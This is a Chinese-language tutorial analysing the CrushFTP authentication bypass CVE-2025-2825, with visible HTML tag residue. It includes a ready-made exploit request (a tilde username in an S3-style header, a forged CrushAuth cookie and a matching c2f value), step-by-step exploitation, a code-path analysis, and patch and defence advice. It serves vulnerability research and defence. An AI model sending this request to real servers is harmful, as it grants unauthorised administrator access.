CrushFTP 身份验证绕过漏洞(CVE-2025-2825)深度分析与利用教学<\/h1>

漏洞概述<\/h2>

CVE-2025-2825<\/strong> 是CrushFTP软件中存在的一个严重身份验证绕过漏洞，影响版本包括：<\/p>

10.0.0 到 10.8.3<\/li>
11.0.0 到 11.3.0<\/li> <\/ul>
该漏洞源于系统对认证标头的不当处理，允许未经授权的远程攻击者通过HTTP\/HTTPS端口获取管理员权限，可能导致：<\/p>

敏感数据访问<\/li>
系统文件修改<\/li>
服务器完全控制<\/li> <\/ul>
环境搭建<\/h2>
使用Docker搭建漏洞环境是最简便的方法：<\/p>
# 拉取受影响版本的CrushFTP镜像<\/span> <\/span><\/span>docker pull crushftp\/vulnerable:10.8.3 <\/span><\/span> <\/span><\/span># 运行容器<\/span> <\/span><\/span>docker run -d -p 8080:8080 -p 21:21 --name crushftp_vuln crushftp\/vulnerable:10.8.3 <\/span><\/span><\/code><\/pre>漏洞复现<\/h2> 构造恶意请求<\/h3> 漏洞利用需要构造特定的HTTP请求头和数据：<\/p> 认证头构造<\/strong>：<\/p> 使用S3风格的授权头格式<\/li> 示例格式： Authorization: AWS4-HMAC-SHA256 Credential=admin~,SignedHeaders=host;x-amz-date,Signature=... <\/code><\/pre> <\/li> 关键点：用户名必须包含波浪号(~)<\/li> <\/ul> <\/li> CSRF防护绕过<\/strong>：<\/p> 需要同时提供有效的CrushAuth<\/code> cookie和c2f<\/code>参数<\/li> CrushAuth<\/code>格式：13位时间戳 + "_" + 30位随机字符串<\/li> c2f<\/code>参数必须匹配cookie末尾4个字符或解码后的用户密码<\/li> <\/ul> <\/li> <\/ol> 完整请求示例<\/h3> POST \/WebInterface\/function\/ HTTP\/1.1 Host: target:8080 Authorization: AWS4-HMAC-SHA256 Credential=admin~,SignedHeaders=host;x-amz-date,Signature=... Cookie: CrushAuth=1234567890123_abcdefghijklmnopqrstuvwxyz123456 Content-Type: multipart\/form-data; boundary=----WebKitFormBoundary ------WebKitFormBoundary Content-Disposition: form-data; name="c2f" yz12 ------WebKitFormBoundary Content-Disposition: form-data; name="command" getUserList ------WebKitFormBoundary-- <\/code><\/pre> 漏洞分析<\/h2> 认证流程分析<\/h3> 初始认证处理<\/strong> (ServerSessionHTTP#loginCheckHeaderAuth<\/code>)<\/p> 从授权头提取用户标识<\/li> 从Credential参数的等号后开始，到第一个斜杠停止作为用户名<\/li> 如果用户名包含波浪号(~)，设置lookup_user_pass<\/code>为false<\/li> 调用login_user_pass<\/code>继续处理<\/li> <\/ul> <\/li> 用户登录处理<\/strong> (SessionCrush#login_user_pass<\/code>)<\/p> 参数传递： lookup_user_pass<\/code> → anyPass<\/code> → true<\/li> doAfterLogin<\/code> → false<\/li> user_name<\/code> → 原始用户名<\/li> user_pass<\/code> → 空字符串<\/li> <\/ul> <\/li> 关键调用：verify_user(user_name, verify_password, anyPass, doAfterLogin)<\/code><\/li> <\/ul> <\/li> 用户验证处理<\/strong> (SessionCrush#verify_user<\/code>)<\/p> 中间处理层：检查系统是否允许登录<\/li> 处理特殊格式的用户名<\/li> 检查密码特殊标记<\/li> <\/ul> <\/li> 最终调用UserTools.ut.verify_user<\/code><\/li> <\/ul> <\/li> 最终验证逻辑<\/strong> (UserTools#verify_user<\/code>)<\/p> 当anyPass<\/code>参数为true时：仅判断用户是否存在<\/li> 不验证密码<\/strong><\/li> <\/ul> <\/li> 这是漏洞的根本原因<\/li> <\/ul> <\/li> <\/ol> CSRF防护机制<\/h3> CrushAuth cookie生成<\/strong> (ServerSessionHTTP#createCookieSession<\/code>)<\/p> 格式：前13个字符为时间戳 + "_" + 30位随机字符串<\/li> 随机字符串生成：Common.makeBoundary(30)<\/code><\/li> <\/ul> <\/li> c2f参数验证<\/strong> (ServerSessionHTTP#parsePostArguments<\/code>)<\/p> 必须满足以下条件之一：匹配cookie末尾4个字符<\/li> 匹配解码后的用户密码<\/li> <\/ul> <\/li> 否则抛出异常<\/li> <\/ul> <\/li> <\/ol> 漏洞利用步骤<\/h2> 确定目标CrushFTP服务器的HTTP\/HTTPS端口<\/li> 构造包含波浪号(~)的用户名(如"admin~")<\/li> 生成有效的CrushAuth cookie： 13位当前时间戳<\/li> 连接30位随机字符串<\/li> <\/ul> <\/li> 提取cookie末尾4个字符作为c2f参数<\/li> 发送包含恶意授权头的HTTP请求<\/li> 通过响应确认是否成功绕过认证<\/li> <\/ol> 漏洞修复方案<\/h2> 官方修复方案主要修改了登录校验方式：<\/p> 移除了基于波浪号的特殊处理<\/li> 强制要求密码验证，即使anyPass为true<\/li> 加强了CSRF防护机制<\/li> <\/ol> 建议升级到以下安全版本：<\/p> 10.8.4及以上<\/li> 11.3.1及以上<\/li> <\/ul> 防御措施<\/h2> 立即升级到安全版本<\/li> 如果无法立即升级：限制访问CrushFTP的HTTP\/HTTPS端口<\/li> 配置网络ACL只允许可信IP访问<\/li> 监控异常认证尝试<\/li> <\/ul> <\/li> 定期审计系统日志<\/li> 实施最小权限原则<\/li> <\/ol> 总结<\/h2> CVE-2025-2825是一个严重的设计缺陷漏洞，通过精心构造的认证头可以完全绕过身份验证。理解其原理不仅有助于防御，也为安全研究人员提供了认证机制设计的反面教材。建议所有使用CrushFTP的组织立即采取行动，减轻潜在风险。<\/p>